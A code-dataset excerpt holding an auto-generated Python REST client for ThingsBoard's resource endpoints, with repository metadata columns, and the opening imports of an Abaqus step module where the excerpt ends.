| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
83c06b5de4c18f3265ff29d3b8ef7a30806c0d6e
| 41,250
|
py
|
Python
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 30
|
2020-06-19T06:42:50.000Z
|
2021-08-23T21:16:36.000Z
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 25
|
2021-08-30T01:17:27.000Z
|
2022-03-16T14:10:14.000Z
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 23
|
2020-07-06T13:41:54.000Z
|
2021-08-23T21:04:50.000Z
|
# coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class TbResourceControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_resource_using_delete1(self, resource_id, **kwargs): # noqa: E501
"""Delete Resource (deleteResource) # noqa: E501
Deletes the Resource. Referencing non-existing Resource Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_resource_using_delete1(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_resource_using_delete1_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.delete_resource_using_delete1_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def delete_resource_using_delete1_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Delete Resource (deleteResource) # noqa: E501
Deletes the Resource. Referencing non-existing Resource Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_resource_using_delete1_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_resource_using_delete1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `delete_resource_using_delete1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/{resourceId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def download_resource_using_get(self, resource_id, **kwargs): # noqa: E501
"""Download Resource (downloadResource) # noqa: E501
Download Resource based on the provided Resource Id. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_resource_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: Resource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.download_resource_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.download_resource_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def download_resource_using_get_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Download Resource (downloadResource) # noqa: E501
Download Resource based on the provided Resource Id. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_resource_using_get_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: Resource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method download_resource_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `download_resource_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/{resourceId}/download', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Resource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_lwm2m_list_objects_page_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjectsPage) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_page_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_lwm2m_list_objects_page_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjectsPage) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_lwm2m_list_objects_page_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_lwm2m_list_objects_page_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_lwm2m_list_objects_page_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/lwm2m/page{?page,pageSize,sortOrder,sortProperty,textSearch}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[LwM2mObject]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_lwm2m_list_objects_using_get(self, sort_order, sort_property, object_ids, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjects) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_using_get(sort_order, sort_property, object_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING) (required)
:param str sort_property: Property of entity to sort by (required)
:param str object_ids: LwM2M Object ids. (required)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, **kwargs) # noqa: E501
else:
(data) = self.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, **kwargs) # noqa: E501
return data
def get_lwm2m_list_objects_using_get_with_http_info(self, sort_order, sort_property, object_ids, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjects) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING) (required)
:param str sort_property: Property of entity to sort by (required)
:param str object_ids: LwM2M Object ids. (required)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort_order', 'sort_property', 'object_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_lwm2m_list_objects_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'sort_order' is set
if ('sort_order' not in params or
params['sort_order'] is None):
raise ValueError("Missing the required parameter `sort_order` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
# verify the required parameter 'sort_property' is set
if ('sort_property' not in params or
params['sort_property'] is None):
raise ValueError("Missing the required parameter `sort_property` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
# verify the required parameter 'object_ids' is set
if ('object_ids' not in params or
params['object_ids'] is None):
raise ValueError("Missing the required parameter `object_ids` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'object_ids' in params:
query_params.append(('objectIds', params['object_ids'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/lwm2m{?objectIds,sortOrder,sortProperty}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[LwM2mObject]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resource_by_id_using_get(self, resource_id, **kwargs): # noqa: E501
"""Get Resource (getResourceById) # noqa: E501
Fetch the Resource object based on the provided Resource Id. Resource is a heavyweight object that includes main information about the Resource and also data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_by_id_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resource_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.get_resource_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def get_resource_by_id_using_get_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Get Resource (getResourceById) # noqa: E501
Fetch the Resource object based on the provided Resource Id. Resource is a heavyweight object that includes main information about the Resource and also data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_by_id_using_get_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resource_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `get_resource_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/{resourceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resource_info_by_id_using_get(self, resource_id, **kwargs): # noqa: E501
"""Get Resource Info (getResourceInfoById) # noqa: E501
Fetch the Resource Info object based on the provided Resource Id. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_info_by_id_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resource_info_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.get_resource_info_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def get_resource_info_by_id_using_get_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Get Resource Info (getResourceInfoById) # noqa: E501
Fetch the Resource Info object based on the provided Resource Id. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_info_by_id_using_get_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resource_info_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `get_resource_info_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/info/{resourceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResourceInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resources_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get Resource Infos (getResources) # noqa: E501
Returns a page of Resource Info objects owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resources_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataTbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resources_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_resources_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_resources_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""Get Resource Infos (getResources) # noqa: E501
Returns a page of Resource Info objects owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resources_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataTbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resources_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_resources_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_resources_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource{?page,pageSize,sortOrder,sortProperty,textSearch}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataTbResourceInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_resource_using_post(self, **kwargs): # noqa: E501
"""Create Or Update Resource (saveResource) # noqa: E501
Create or update the Resource. When creating the Resource, platform generates Resource id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Resource id will be present in the response. Specify existing Resource id to update the Resource. Referencing non-existing Resource Id will cause 'Not Found' error. Resource combination of the title with the key is unique in the scope of tenant. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_resource_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param TbResource body:
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_resource_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_resource_using_post_with_http_info(**kwargs) # noqa: E501
return data
def save_resource_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Create Or Update Resource (saveResource) # noqa: E501
Create or update the Resource. When creating the Resource, platform generates Resource id as [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Resource id will be present in the response. Specify existing Resource id to update the Resource. Referencing non-existing Resource Id will cause 'Not Found' error. Resource combination of the title with the key is unique in the scope of tenant. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_resource_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param TbResource body:
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_resource_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.529412
| 566
| 0.651442
| 5,070
| 41,250
| 5.061341
| 0.057594
| 0.039593
| 0.017458
| 0.022447
| 0.964343
| 0.956705
| 0.951872
| 0.943221
| 0.940026
| 0.934726
| 0
| 0.020787
| 0.266424
| 41,250
| 849
| 567
| 48.586572
| 0.827231
| 0.426327
| 0
| 0.796053
| 0
| 0
| 0.21159
| 0.066285
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037281
| false
| 0
| 0.008772
| 0
| 0.100877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83c73940406bc5cab5fe7665f127a6606f11ba4c
| 27,672
|
py
|
Python
|
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/Step/DirectCyclicStep.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .AnalysisStep import AnalysisStep
from ..Adaptivity.AdaptiveMeshConstraintState import AdaptiveMeshConstraintState
from ..Adaptivity.AdaptiveMeshDomain import AdaptiveMeshDomain
from ..BoundaryCondition.BoundaryConditionState import BoundaryConditionState
from ..Load.LoadCase import LoadCase
from ..Load.LoadState import LoadState
from ..PredefinedField.PredefinedFieldState import PredefinedFieldState
from ..StepMiscellaneous.Control import Control
from ..StepMiscellaneous.SolverControl import SolverControl
from ..StepOutput.DiagnosticPrint import DiagnosticPrint
